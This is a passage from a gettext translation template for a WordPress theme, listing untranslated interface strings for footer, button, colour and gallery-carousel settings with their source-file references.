framework-customizations/extensions/footers/footers/footer-04/options.php:367 msgid "Select the social icons color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:388 #: framework-customizations/extensions/footers/footers/footer-02/options.php:381 #: framework-customizations/extensions/footers/footers/footer-03/options.php:369 #: framework-customizations/extensions/footers/footers/footer-04/options.php:373 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:234 msgid "Social Hover Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:389 #: framework-customizations/extensions/footers/footers/footer-02/options.php:382 #: framework-customizations/extensions/footers/footers/footer-03/options.php:370 #: framework-customizations/extensions/footers/footers/footer-04/options.php:374 msgid "Select the social icons hover color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:396 #: framework-customizations/extensions/footers/footers/footer-02/options.php:389 #: framework-customizations/extensions/footers/footers/footer-03/options.php:377 #: framework-customizations/extensions/footers/footers/footer-04/options.php:381 msgid "Social Icon Size" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:397 #: framework-customizations/extensions/footers/footers/footer-02/options.php:390 #: framework-customizations/extensions/footers/footers/footer-03/options.php:378 #: framework-customizations/extensions/footers/footers/footer-04/options.php:382 msgid "Enter icon size in pixels. Ex: 16" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:404 #: framework-customizations/extensions/footers/footers/footer-02/options.php:397 #: framework-customizations/extensions/footers/footers/footer-03/options.php:385 #: framework-customizations/extensions/footers/footers/footer-04/options.php:389 msgid "Left Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:410 #: framework-customizations/extensions/footers/footers/footer-01/options.php:563 #: framework-customizations/extensions/footers/footers/footer-01/options.php:716 #: framework-customizations/extensions/footers/footers/footer-02/options.php:403 #: framework-customizations/extensions/footers/footers/footer-02/options.php:555 #: framework-customizations/extensions/footers/footers/footer-02/options.php:707 #: framework-customizations/extensions/footers/footers/footer-03/options.php:391 #: framework-customizations/extensions/footers/footers/footer-03/options.php:543 #: framework-customizations/extensions/footers/footers/footer-03/options.php:695 #: framework-customizations/extensions/footers/footers/footer-04/options.php:395 #: framework-customizations/extensions/footers/footers/footer-04/options.php:547 #: framework-customizations/extensions/footers/footers/footer-04/options.php:699 msgid "Show/Hide This Area" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:412 #: framework-customizations/extensions/footers/footers/footer-02/options.php:405 #: framework-customizations/extensions/footers/footers/footer-03/options.php:393 #: framework-customizations/extensions/footers/footers/footer-04/options.php:397 msgid "Show or hide Left Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:425 #: framework-customizations/extensions/footers/footers/footer-01/options.php:578 #: framework-customizations/extensions/footers/footers/footer-01/options.php:731 #: framework-customizations/extensions/footers/footers/footer-02/options.php:418 #: framework-customizations/extensions/footers/footers/footer-02/options.php:570 #: framework-customizations/extensions/footers/footers/footer-02/options.php:722 #: framework-customizations/extensions/footers/footers/footer-03/options.php:406 #: framework-customizations/extensions/footers/footers/footer-03/options.php:558 #: framework-customizations/extensions/footers/footers/footer-03/options.php:710 #: framework-customizations/extensions/footers/footers/footer-04/options.php:410 #: framework-customizations/extensions/footers/footers/footer-04/options.php:562 #: framework-customizations/extensions/footers/footers/footer-04/options.php:714 #: framework-customizations/extensions/headers/headers/header-09/options/text_link.php:6 msgid "Text" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:426 #: framework-customizations/extensions/footers/footers/footer-01/options.php:579 #: framework-customizations/extensions/footers/footers/footer-01/options.php:732 #: framework-customizations/extensions/footers/footers/footer-02/options.php:419 #: framework-customizations/extensions/footers/footers/footer-02/options.php:571 #: framework-customizations/extensions/footers/footers/footer-02/options.php:723 #: framework-customizations/extensions/footers/footers/footer-03/options.php:407 #: framework-customizations/extensions/footers/footers/footer-03/options.php:559 #: framework-customizations/extensions/footers/footers/footer-03/options.php:711 #: framework-customizations/extensions/footers/footers/footer-04/options.php:411 #: framework-customizations/extensions/footers/footers/footer-04/options.php:563 #: framework-customizations/extensions/footers/footers/footer-04/options.php:715 msgid "Write text will display in this area" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:430 #: framework-customizations/extensions/footers/footers/footer-01/options.php:583 #: framework-customizations/extensions/footers/footers/footer-01/options.php:736 #: framework-customizations/extensions/footers/footers/footer-02/options.php:423 #: framework-customizations/extensions/footers/footers/footer-02/options.php:575 #: framework-customizations/extensions/footers/footers/footer-02/options.php:727 #: framework-customizations/extensions/footers/footers/footer-03/options.php:411 #: framework-customizations/extensions/footers/footers/footer-03/options.php:563 #: framework-customizations/extensions/footers/footers/footer-03/options.php:715 #: framework-customizations/extensions/footers/footers/footer-04/options.php:415 #: framework-customizations/extensions/footers/footers/footer-04/options.php:567 #: framework-customizations/extensions/footers/footers/footer-04/options.php:719 msgid "Social" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:436 #: framework-customizations/extensions/footers/footers/footer-01/options.php:585 #: framework-customizations/extensions/footers/footers/footer-01/options.php:738 #: framework-customizations/extensions/footers/footers/footer-02/options.php:429 #: framework-customizations/extensions/footers/footers/footer-02/options.php:577 #: framework-customizations/extensions/footers/footers/footer-02/options.php:729 #: framework-customizations/extensions/footers/footers/footer-03/options.php:417 #: framework-customizations/extensions/footers/footers/footer-03/options.php:565 #: framework-customizations/extensions/footers/footers/footer-03/options.php:717 #: framework-customizations/extensions/footers/footers/footer-04/options.php:421 #: framework-customizations/extensions/footers/footers/footer-04/options.php:569 #: framework-customizations/extensions/footers/footers/footer-04/options.php:721 msgid "" "Show social icon in footer bottom? Change social in the \"General\" settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:444 #: framework-customizations/extensions/footers/footers/footer-01/options.php:597 #: framework-customizations/extensions/footers/footers/footer-01/options.php:750 #: framework-customizations/extensions/footers/footers/footer-02/options.php:437 #: framework-customizations/extensions/footers/footers/footer-02/options.php:589 #: framework-customizations/extensions/footers/footers/footer-02/options.php:741 #: framework-customizations/extensions/footers/footers/footer-03/options.php:425 #: framework-customizations/extensions/footers/footers/footer-03/options.php:577 #: framework-customizations/extensions/footers/footers/footer-03/options.php:729 #: framework-customizations/extensions/footers/footers/footer-04/options.php:429 #: framework-customizations/extensions/footers/footers/footer-04/options.php:581 #: framework-customizations/extensions/footers/footers/footer-04/options.php:733 msgid "Navigation" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:445 #: framework-customizations/extensions/footers/footers/footer-01/options.php:598 #: framework-customizations/extensions/footers/footers/footer-01/options.php:751 #: framework-customizations/extensions/footers/footers/footer-02/options.php:438 #: framework-customizations/extensions/footers/footers/footer-02/options.php:590 #: framework-customizations/extensions/footers/footers/footer-02/options.php:742 #: framework-customizations/extensions/footers/footers/footer-03/options.php:426 #: framework-customizations/extensions/footers/footers/footer-03/options.php:578 #: framework-customizations/extensions/footers/footers/footer-03/options.php:730 #: framework-customizations/extensions/footers/footers/footer-04/options.php:430 #: framework-customizations/extensions/footers/footers/footer-04/options.php:582 #: framework-customizations/extensions/footers/footers/footer-04/options.php:734 msgid "" "Show navigation in this area? Please choose locations is \"Bottom menu\" in " msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:445 #: framework-customizations/extensions/footers/footers/footer-01/options.php:598 #: framework-customizations/extensions/footers/footers/footer-01/options.php:751 #: framework-customizations/extensions/footers/footers/footer-02/options.php:438 #: framework-customizations/extensions/footers/footers/footer-02/options.php:590 #: framework-customizations/extensions/footers/footers/footer-02/options.php:742 #: framework-customizations/extensions/footers/footers/footer-03/options.php:426 #: framework-customizations/extensions/footers/footers/footer-03/options.php:578 #: framework-customizations/extensions/footers/footers/footer-03/options.php:730 #: framework-customizations/extensions/footers/footers/footer-04/options.php:430 #: framework-customizations/extensions/footers/footers/footer-04/options.php:582 #: framework-customizations/extensions/footers/footers/footer-04/options.php:734 #: framework-customizations/theme/options/posts/page.php:114 #: framework-customizations/theme/options/posts/post.php:73 #: framework-customizations/theme/options/posts/product.php:61 #: framework-customizations/theme/options/posts/slz-faq.php:61 #: framework-customizations/theme/options/posts/slz-portfolio.php:61 #: framework-customizations/theme/options/posts/slz-service.php:61 #: framework-customizations/theme/options/posts/slz-team.php:61 #: framework-customizations/theme/options/taxonomies/category.php:58 #: framework-customizations/theme/options/taxonomies/slz-faq-cat.php:55 msgid "Appearance" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:445 #: framework-customizations/extensions/footers/footers/footer-01/options.php:598 #: framework-customizations/extensions/footers/footers/footer-01/options.php:751 #: framework-customizations/extensions/footers/footers/footer-02/options.php:438 #: framework-customizations/extensions/footers/footers/footer-02/options.php:590 #: framework-customizations/extensions/footers/footers/footer-02/options.php:742 #: framework-customizations/extensions/footers/footers/footer-03/options.php:426 #: framework-customizations/extensions/footers/footers/footer-03/options.php:578 #: framework-customizations/extensions/footers/footers/footer-03/options.php:730 #: framework-customizations/extensions/footers/footers/footer-04/options.php:430 #: framework-customizations/extensions/footers/footers/footer-04/options.php:582 #: framework-customizations/extensions/footers/footers/footer-04/options.php:734 msgid "Menus" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:458 #: framework-customizations/extensions/footers/footers/footer-01/options.php:611 #: framework-customizations/extensions/footers/footers/footer-01/options.php:764 #: framework-customizations/extensions/footers/footers/footer-02/options.php:451 #: framework-customizations/extensions/footers/footers/footer-02/options.php:603 #: framework-customizations/extensions/footers/footers/footer-02/options.php:755 #: framework-customizations/extensions/footers/footers/footer-03/options.php:439 #: framework-customizations/extensions/footers/footers/footer-03/options.php:591 #: framework-customizations/extensions/footers/footers/footer-03/options.php:743 #: framework-customizations/extensions/footers/footers/footer-04/options.php:443 #: framework-customizations/extensions/footers/footers/footer-04/options.php:595 #: framework-customizations/extensions/footers/footers/footer-04/options.php:747 msgid " Add Image" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:461 #: framework-customizations/extensions/footers/footers/footer-01/options.php:614 #: framework-customizations/extensions/footers/footers/footer-01/options.php:767 #: framework-customizations/extensions/footers/footers/footer-02/options.php:454 #: framework-customizations/extensions/footers/footers/footer-02/options.php:606 #: framework-customizations/extensions/footers/footers/footer-02/options.php:758 #: framework-customizations/extensions/footers/footers/footer-03/options.php:442 #: framework-customizations/extensions/footers/footers/footer-03/options.php:594 #: framework-customizations/extensions/footers/footers/footer-03/options.php:746 #: framework-customizations/extensions/footers/footers/footer-04/options.php:446 #: framework-customizations/extensions/footers/footers/footer-04/options.php:598 #: framework-customizations/extensions/footers/footers/footer-04/options.php:750 msgid "Upload an image to display in footer bottom." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:469 #: framework-customizations/extensions/footers/footers/footer-01/options.php:622 #: framework-customizations/extensions/footers/footers/footer-01/options.php:775 #: framework-customizations/extensions/footers/footers/footer-02/options.php:462 #: framework-customizations/extensions/footers/footers/footer-02/options.php:614 #: framework-customizations/extensions/footers/footers/footer-02/options.php:766 #: framework-customizations/extensions/footers/footers/footer-03/options.php:450 #: framework-customizations/extensions/footers/footers/footer-03/options.php:602 #: framework-customizations/extensions/footers/footers/footer-03/options.php:754 #: framework-customizations/extensions/footers/footers/footer-04/options.php:454 #: framework-customizations/extensions/footers/footers/footer-04/options.php:606 #: framework-customizations/extensions/footers/footers/footer-04/options.php:758 #: framework-customizations/extensions/headers/headers/header-09/class-slz-header-header-09.php:101 #: framework-customizations/extensions/headers/headers/header-09/options.php:25 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:42 #: framework-customizations/extensions/shortcodes/shortcodes/button/config.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/content-carousel/vc_options.php:33 msgid "Button" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:470 #: framework-customizations/extensions/footers/footers/footer-01/options.php:623 #: framework-customizations/extensions/footers/footers/footer-01/options.php:776 #: framework-customizations/extensions/footers/footers/footer-02/options.php:463 #: framework-customizations/extensions/footers/footers/footer-02/options.php:615 #: framework-customizations/extensions/footers/footers/footer-02/options.php:767 #: framework-customizations/extensions/footers/footers/footer-03/options.php:451 #: framework-customizations/extensions/footers/footers/footer-03/options.php:603 #: framework-customizations/extensions/footers/footers/footer-03/options.php:755 #: framework-customizations/extensions/footers/footers/footer-04/options.php:455 #: framework-customizations/extensions/footers/footers/footer-04/options.php:607 #: framework-customizations/extensions/footers/footers/footer-04/options.php:759 msgid "Show button in this area" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:490 #: framework-customizations/extensions/footers/footers/footer-01/options.php:643 #: framework-customizations/extensions/footers/footers/footer-01/options.php:796 #: framework-customizations/extensions/footers/footers/footer-02/options.php:483 #: framework-customizations/extensions/footers/footers/footer-02/options.php:635 #: framework-customizations/extensions/footers/footers/footer-02/options.php:787 #: framework-customizations/extensions/footers/footers/footer-03/options.php:471 #: framework-customizations/extensions/footers/footers/footer-03/options.php:623 #: framework-customizations/extensions/footers/footers/footer-03/options.php:775 #: framework-customizations/extensions/footers/footers/footer-04/options.php:475 #: framework-customizations/extensions/footers/footers/footer-04/options.php:627 #: framework-customizations/extensions/footers/footers/footer-04/options.php:779 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:131 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:140 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:149 #: framework-customizations/extensions/shortcodes/shortcodes/contact-form/vc_options.php:158 msgid "Button Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:491 #: framework-customizations/extensions/footers/footers/footer-01/options.php:644 #: framework-customizations/extensions/footers/footers/footer-01/options.php:797 #: framework-customizations/extensions/footers/footers/footer-02/options.php:484 #: framework-customizations/extensions/footers/footers/footer-02/options.php:636 #: framework-customizations/extensions/footers/footers/footer-02/options.php:788 #: framework-customizations/extensions/footers/footers/footer-03/options.php:472 #: framework-customizations/extensions/footers/footers/footer-03/options.php:624 #: framework-customizations/extensions/footers/footers/footer-03/options.php:776 #: framework-customizations/extensions/footers/footers/footer-04/options.php:476 #: framework-customizations/extensions/footers/footers/footer-04/options.php:628 #: framework-customizations/extensions/footers/footers/footer-04/options.php:780 msgid "Setting for button" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:492 #: framework-customizations/extensions/footers/footers/footer-01/options.php:645 #: framework-customizations/extensions/footers/footers/footer-01/options.php:798 #: framework-customizations/extensions/footers/footers/footer-02/options.php:485 #: framework-customizations/extensions/footers/footers/footer-02/options.php:637 #: framework-customizations/extensions/footers/footers/footer-02/options.php:789 #: framework-customizations/extensions/footers/footers/footer-03/options.php:473 #: framework-customizations/extensions/footers/footers/footer-03/options.php:625 #: framework-customizations/extensions/footers/footers/footer-03/options.php:777 #: framework-customizations/extensions/footers/footers/footer-04/options.php:477 #: framework-customizations/extensions/footers/footers/footer-04/options.php:629 #: framework-customizations/extensions/footers/footers/footer-04/options.php:781 #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:36 #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:42 #: framework-customizations/extensions/headers/headers/header-09/views/login_register.php:46 msgid "Settings" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:497 #: framework-customizations/extensions/footers/footers/footer-01/options.php:650 #: framework-customizations/extensions/footers/footers/footer-01/options.php:803 #: framework-customizations/extensions/footers/footers/footer-02/options.php:490 #: framework-customizations/extensions/footers/footers/footer-02/options.php:642 #: framework-customizations/extensions/footers/footers/footer-02/options.php:794 #: framework-customizations/extensions/footers/footers/footer-03/options.php:478 #: framework-customizations/extensions/footers/footers/footer-03/options.php:630 #: framework-customizations/extensions/footers/footers/footer-03/options.php:782 #: framework-customizations/extensions/footers/footers/footer-04/options.php:482 #: framework-customizations/extensions/footers/footers/footer-04/options.php:634 #: framework-customizations/extensions/footers/footers/footer-04/options.php:786 #: framework-customizations/extensions/lema/shortcodes/featured-course/vc_options.php:100 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-price.php:62 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-search-box.php:85 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-uni-search-box.php:59 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:43 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:251 #: framework-customizations/extensions/widgets/widgets/button/options.php:18 msgid "Button Text" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:501 #: framework-customizations/extensions/footers/footers/footer-01/options.php:654 #: framework-customizations/extensions/footers/footers/footer-01/options.php:807 #: framework-customizations/extensions/footers/footers/footer-02/options.php:494 #: framework-customizations/extensions/footers/footers/footer-02/options.php:646 #: framework-customizations/extensions/footers/footers/footer-02/options.php:798 #: framework-customizations/extensions/footers/footers/footer-03/options.php:482 #: framework-customizations/extensions/footers/footers/footer-03/options.php:634 #: framework-customizations/extensions/footers/footers/footer-03/options.php:786 #: framework-customizations/extensions/footers/footers/footer-04/options.php:486 #: framework-customizations/extensions/footers/footers/footer-04/options.php:638 #: framework-customizations/extensions/footers/footers/footer-04/options.php:790 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:73 #: framework-customizations/extensions/shortcodes/shortcodes/button/vc_options.php:94 #: framework-customizations/extensions/shortcodes/shortcodes/pricing-box/vc_options.php:260 #: framework-customizations/extensions/widgets/widgets/button/options.php:23 #: framework-customizations/theme/options/page-404-settings.php:87 msgid "Button Link" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:505 #: framework-customizations/extensions/footers/footers/footer-01/options.php:658 #: framework-customizations/extensions/footers/footers/footer-02/options.php:498 #: framework-customizations/extensions/footers/footers/footer-02/options.php:650 #: framework-customizations/extensions/footers/footers/footer-02/options.php:802 #: framework-customizations/extensions/footers/footers/footer-03/options.php:486 #: framework-customizations/extensions/footers/footers/footer-03/options.php:638 #: framework-customizations/extensions/footers/footers/footer-04/options.php:490 #: framework-customizations/extensions/footers/footers/footer-04/options.php:642 #: framework-customizations/extensions/footers/footers/footer-04/options.php:794 msgid "Select background color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:512 #: framework-customizations/extensions/footers/footers/footer-01/options.php:818 #: framework-customizations/extensions/footers/footers/footer-02/options.php:505 #: framework-customizations/extensions/footers/footers/footer-02/options.php:657 #: framework-customizations/extensions/footers/footers/footer-02/options.php:809 #: framework-customizations/extensions/footers/footers/footer-03/options.php:493 #: framework-customizations/extensions/footers/footers/footer-03/options.php:645 #: framework-customizations/extensions/footers/footers/footer-03/options.php:797 #: framework-customizations/extensions/footers/footers/footer-04/options.php:497 #: framework-customizations/extensions/footers/footers/footer-04/options.php:649 #: framework-customizations/extensions/footers/footers/footer-04/options.php:801 msgid "Select text color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:518 #: framework-customizations/extensions/footers/footers/footer-01/options.php:671 #: framework-customizations/extensions/footers/footers/footer-01/options.php:824 #: framework-customizations/extensions/footers/footers/footer-02/options.php:511 #: framework-customizations/extensions/footers/footers/footer-02/options.php:663 #: framework-customizations/extensions/footers/footers/footer-02/options.php:815 #: framework-customizations/extensions/footers/footers/footer-03/options.php:499 #: framework-customizations/extensions/footers/footers/footer-03/options.php:651 #: framework-customizations/extensions/footers/footers/footer-03/options.php:803 #: framework-customizations/extensions/footers/footers/footer-04/options.php:503 #: framework-customizations/extensions/footers/footers/footer-04/options.php:655 #: framework-customizations/extensions/footers/footers/footer-04/options.php:807 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:46 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:52 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:47 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:38 msgid "Border Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:519 #: framework-customizations/extensions/footers/footers/footer-01/options.php:672 #: framework-customizations/extensions/footers/footers/footer-01/options.php:825 #: framework-customizations/extensions/footers/footers/footer-02/options.php:512 #: framework-customizations/extensions/footers/footers/footer-02/options.php:664 #: framework-customizations/extensions/footers/footers/footer-02/options.php:816 #: framework-customizations/extensions/footers/footers/footer-03/options.php:500 #: framework-customizations/extensions/footers/footers/footer-03/options.php:652 #: framework-customizations/extensions/footers/footers/footer-03/options.php:804 #: framework-customizations/extensions/footers/footers/footer-04/options.php:504 #: framework-customizations/extensions/footers/footers/footer-04/options.php:656 #: framework-customizations/extensions/footers/footers/footer-04/options.php:808 msgid "Select border color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:525 #: framework-customizations/extensions/footers/footers/footer-01/options.php:678 #: framework-customizations/extensions/footers/footers/footer-01/options.php:831 #: framework-customizations/extensions/footers/footers/footer-02/options.php:518 #: framework-customizations/extensions/footers/footers/footer-02/options.php:670 #: framework-customizations/extensions/footers/footers/footer-02/options.php:822 #: framework-customizations/extensions/footers/footers/footer-03/options.php:506 #: framework-customizations/extensions/footers/footers/footer-03/options.php:658 #: framework-customizations/extensions/footers/footers/footer-03/options.php:810 #: framework-customizations/extensions/footers/footers/footer-04/options.php:510 #: framework-customizations/extensions/footers/footers/footer-04/options.php:662 #: framework-customizations/extensions/footers/footers/footer-04/options.php:814 msgid "Background Hover Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:531 #: framework-customizations/extensions/footers/footers/footer-01/options.php:684 #: framework-customizations/extensions/footers/footers/footer-01/options.php:837 #: framework-customizations/extensions/footers/footers/footer-02/options.php:524 #: framework-customizations/extensions/footers/footers/footer-02/options.php:676 #: framework-customizations/extensions/footers/footers/footer-02/options.php:828 #: framework-customizations/extensions/footers/footers/footer-03/options.php:512 #: framework-customizations/extensions/footers/footers/footer-03/options.php:664 #: framework-customizations/extensions/footers/footers/footer-03/options.php:816 #: framework-customizations/extensions/footers/footers/footer-04/options.php:516 #: framework-customizations/extensions/footers/footers/footer-04/options.php:668 #: framework-customizations/extensions/footers/footers/footer-04/options.php:820 msgid "Text Hover Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:537 #: framework-customizations/extensions/footers/footers/footer-01/options.php:690 #: framework-customizations/extensions/footers/footers/footer-01/options.php:843 #: framework-customizations/extensions/footers/footers/footer-02/options.php:530 #: framework-customizations/extensions/footers/footers/footer-02/options.php:682 #: framework-customizations/extensions/footers/footers/footer-02/options.php:834 #: framework-customizations/extensions/footers/footers/footer-03/options.php:518 #: framework-customizations/extensions/footers/footers/footer-03/options.php:670 #: framework-customizations/extensions/footers/footers/footer-03/options.php:822 #: framework-customizations/extensions/footers/footers/footer-04/options.php:522 #: framework-customizations/extensions/footers/footers/footer-04/options.php:674 #: framework-customizations/extensions/footers/footers/footer-04/options.php:826 msgid "Border Hover Color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:557 #: framework-customizations/extensions/footers/footers/footer-02/options.php:549 #: framework-customizations/extensions/footers/footers/footer-03/options.php:537 #: framework-customizations/extensions/footers/footers/footer-04/options.php:541 msgid "Center Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:565 #: framework-customizations/extensions/footers/footers/footer-02/options.php:557 #: framework-customizations/extensions/footers/footers/footer-03/options.php:545 #: framework-customizations/extensions/footers/footers/footer-04/options.php:549 msgid "Show or hide Center Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:580 #: framework-customizations/extensions/footers/footers/footer-02/options.php:572 #: framework-customizations/extensions/footers/footers/footer-03/options.php:560 #: framework-customizations/extensions/footers/footers/footer-04/options.php:564 msgid "&copy; Designed by RubikThemes." msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:665 msgid "Select text color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:710 #: framework-customizations/extensions/footers/footers/footer-02/options.php:701 #: framework-customizations/extensions/footers/footers/footer-03/options.php:689 #: framework-customizations/extensions/footers/footers/footer-04/options.php:693 msgid "Right Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:718 #: framework-customizations/extensions/footers/footers/footer-02/options.php:709 #: framework-customizations/extensions/footers/footers/footer-03/options.php:697 #: framework-customizations/extensions/footers/footers/footer-04/options.php:701 msgid "Show or hide Right Area Content" msgstr "" #: framework-customizations/extensions/footers/footers/footer-01/options.php:811 #: framework-customizations/extensions/footers/footers/footer-03/options.php:790 msgid "Select background color" msgstr "" #: framework-customizations/extensions/footers/footers/footer-04/options.php:257 #: framework-customizations/theme/options/footer-options.php:78 msgid "Choose widget area will show in footer main" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:10 msgid "SLZ Gallery Carousel" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:11 msgid "Animated Carousel with gallery or portfolio." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/config.php:23 #: framework-customizations/extensions/shortcodes/shortcodes/posts-carousel/config.php:27 #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:33 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:21 msgid "Brazil" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-1.php:18 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:19 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:14 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:47 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:68 #: framework-customizations/extensions/gallery/shortcodes/isotope/vc_options.php:71 #: framework-customizations/extensions/new-tweet/shortcodes/new-tweet/options/layout-1.php:18 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:142 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:153 #: framework-customizations/extensions/shortcodes/shortcodes/item-list/vc_options.php:74 #: framework-customizations/extensions/shortcodes/shortcodes/newsletter/vc_options.php:15 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/options/layout-4.php:11 #: framework-customizations/extensions/shortcodes/shortcodes/progress-bar/options/layout-1.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:17 msgid "Choose style to show" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:7 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:6 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:67 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:20 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:6 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:51 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:4 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:37 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:4 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-2.php:4 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:3 msgid "Chennai" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:8 #: framework-customizations/extensions/lema/shortcodes/course-collection/options/layout-2.php:7 #: framework-customizations/extensions/lema/shortcodes/slz-shortcode-lema-category-list.php:68 #: framework-customizations/extensions/shortcodes/shortcodes/about-me/vc_options.php:21 #: framework-customizations/extensions/shortcodes/shortcodes/contact/options/layout-2.php:7 #: framework-customizations/extensions/shortcodes/shortcodes/counterv2/vc_options.php:52 #: framework-customizations/extensions/shortcodes/shortcodes/icons-block/options/layout-2.php:5 #: framework-customizations/extensions/shortcodes/shortcodes/posts-block/config.php:38 #: framework-customizations/extensions/shortcodes/shortcodes/video/options/layout-2.php:5 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-2.php:5 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:4 msgid "Mumbai" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:23 msgid "Picture Frame" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-2.php:29 msgid "Upload one image to make frame for featured image." msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:3 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:3 msgid "Sao Paulo" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:4 msgid "Rio" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:5 msgid "Brasilia" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:22 msgid "Main Title" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/options/layout-6.php:25 msgid "Title of gallery" msgstr "" #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:13 #: framework-customizations/extensions/gallery/shortcodes/gallery-carousel/vc_options.php:18 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:24 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:29 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:35 #: framework-customizations/extensions/gallery/shortcodes/gallery-grid/vc_options.php:176 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:29 #: framework-customizations/extensions/gallery/shortcodes/gallery-masonry/vc_options.php:34 #: 